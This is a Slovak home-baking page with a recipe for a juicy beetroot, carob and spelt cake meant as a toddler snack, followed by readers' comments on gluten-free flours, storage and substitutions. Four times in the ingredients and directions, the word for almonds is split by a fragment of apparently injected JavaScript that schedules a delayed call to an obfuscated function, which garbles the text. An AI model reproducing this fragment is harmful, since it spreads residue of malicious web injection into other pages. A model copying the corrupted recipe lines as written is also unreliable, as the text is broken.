Miuškin „cvikláč“

Tento Miuškin koláčik sa transformoval podľa toho, ako rástla a zavádzali sme postupne príkrmy. Začínala som len s múkou, cviklou, žĺtkom a karobom 🙂 A postupne sa z toho stal náš rodinný koláčový miláčik. Miuške sme zo začiatku robili bez cukru a potom časom, ako rástla, sme ho začali ochucovať a pridávať potraviny podľa toho, ako sme ich zavádzali do jej jedálnička. Decká, ktoré k nám prišli na návštevu, si vždy veľmi pochvaľovali a maminy museli aj doma upiecť  😀 😀

Treba rátať s tým, že základ „cvikláča“ tvorí naozajstné zeleninové pyré a teda nikdy nebude mať konzistenciu piškótového cesta, alebo muffinu, jedine, že by ste pridali viac múky, ale ja som chcela taký koláč, ktorý keď zoberiem na ihrisko, tak viem, že moje dieťa má vyváženú desiatu, či olovrant aj mimo domu. Takže je taký šťavnatejší a kým ho nakrájate, nechajte ho úplne vychladnúť.

Ingrediencie

  • 380 g uvarenej cvikly
  • 2 pl golden ľanových semiačok
  • 1,5 čl škorice
  • 1,5 kl sušenej mletej vanilky
  • 3 pl svetlého karobu (ten tmavý má príliš výraznú chuť, ale môžete aj ten použiť)
  • 80 g ghee masla, alebo roztopeného obyčajného masla – ak chcete vegánsky koláčik, kvalitným olejom z hroznových jadierok nič nepokazíte
  • 200 ml mlieka (kravského, alebo rastlinného – ak dávate rastlinné z obchodu, to je prirodzene sladké a teda treba potom ubrať z cukru. Veľmi dobre sa tam hodí domáce mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľové mlieko)
  • 130 g cukru z kokosových kvetov, má nízky glykemický index 35. Podľa mňa jedna z najlepších alternatív sladenia pri pečení pre deti. Môžete samozrejme použiť aj muscovado alebo trstinový cukor
  • 60 g polohrubej špaldovej múky
  • 100g hladkej celozrnnej špaldovej múky (pre detičky  do roka a pol s celozrnnými múkami opatrne, používala som vtedy hladkú špaldovú múku)
  • šťavu z 1 citróna
  • 1/2 čl sódy pridáte úplne na záver
  • mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle a kokosový cukor na posypanie
  • Múky samozrejme môžete obmieňať ľubovolne. Robila som tento koláčik už aj v bezlepkovej variante, keď bola Miuška maličká. Stačí zmiešať gaštanovú, kukuričnú, ryžovú a kokosovú múku a mňamka je na svete. 

Directions

  1. Cviklu si uvaríme v šupke do mäkka. Ja ju varím v tlakovom hrnci a za cca 40 minút je hotová. Dajte si rozohriať rúru na 175 stupňov program teplovzduch. Po vychladnutí cviklu ošúpte (odporúčam v jednorazových rukaviciach, aby ste sa nezašpinili), odvážte potrebné množstvo, nakrájajte na kocky a ponorným mixérom v úzkej vysokej nádobe rozmixujte na pyré. Pridajte postupne všetky ingrediencie a premiešajte. Úplne nakoniec vmiešajte sódu bikarbónu a poriadne krátko zamiešajte.
  2. Pripravte si plech, vysteľte ho papierom na pečenie a vylejte doň cesto. Dajte pozor, aby ste nemali príliš malý plech a cesto nebolo hrubé, neprepieklo by sa dobre a bol by mokrý. Uhlaďte ho stierkou, posypte mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľami a kokosovým cukrom a dajte piecť do rúry na takú hodinku. Podľa toho, ako vám pečie rúra. Testovať špáradlom môžete, ale aj po hodine sa bude trošku lepiť. Nemusíte sa toho ale báť, on po vychladnutí stuhne. Studený koláč (horúci sa zle krája) nakrájajte na malinké kocky, také jednohubky, ktoré decká môžu popri hre zobkať aj doma. Ak máte menšie detičky, mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle samozrejme vynechajte.

U nás tento koláčik robievame z dvojitej dávky na veľký plech, milujú ho aj moji rodičia. Môžete ho pre dospelákov po vychladnutí poliať čokoládovým ganache, to je úplne že nebíčko v papuľke 😀

Želám vám dobrú chuť 😉

Ohodnoť Recept

11 komentárov

  1. Mirka, prosim ta, v akom pomere si davala tie bezlepkove muky? 1:1:1:1? Alebo bola niektora v prevahe? Dakujem

     
    • Ahoj 🙂 Toto je kolac uplne od oka…daj v rovnakom pomere ryzovu s kukuricnou a pohankovou, ked mas male dieta..kokosovu by som az od roka, roka a pol davala 🙂 Ja som tie muky vzdy davala tak, ako sa mi vysypalo 😀 Iba kvoli zverejneniu receptu som to zacala vazit 🙂

       
  2. Neskutočne mega chutny kolacik..:-p v tej bezlepkovej verzii uplna pecka! Zaradujem do rodinneho repertoara (na zelanie polovicky a deti).. 😉

     
    • Martinka (Veska), ani nevies, ako sa velmi tesim…ja som ho prvy raz s malou dusickou robila doma a necakala som, ze az tak bude chutit…dokonca aj mojim rodicom 😀 Tak pozdravujem domaaa a dakujem za spatnu vazbu :-* 😀 😀

       
  3. Ahoj:) akurat peciem koláčik:) zaujimalo by ma skladovanie:)mozem ho dat do nejakej nádoby a nechat len tak?:)

     
    • Ja ho davam vylucne v uzatvaratelnej nadobe do chladnicky…predsalen tam je vela varenej cvikle…A jest ho max 2 dni 🙂

       
  4. je naozaj vyborny. ja som dohno pridala este jeden zrely banan, ktory uz nikto nechcel 🙂 a velmi zaujimave vypepsenie

     
  5. Ahoj, prosim ta ako vyzeral ten recept ked si pouzila len muku, zltok a cviklu? 🙂 mam doma 8 mesacnu princeznu a cviklu ako prikrm miluje, tak by som jej chcela tejto tvoj uzasny kolacik urobit, len mlieko este nedavam a UM tiez nie, kedze dojcim. Dakujem krasne.

     
    • nemusis dat mlieko…alebo ho nahrad konzistencne jablkovym pyre…ja ten kolacik netusim, kde mam zapisany :-/ Ale nie je na tom co pokazit, naozaj…vynechaj to, co nedavas este 🙂

       
  6. Mirka prosim ta, mozem pouzit aj obycajne lanove semiacka a namiesto masla repkovy olej? Dakujem 🙂

     

Napíš Koment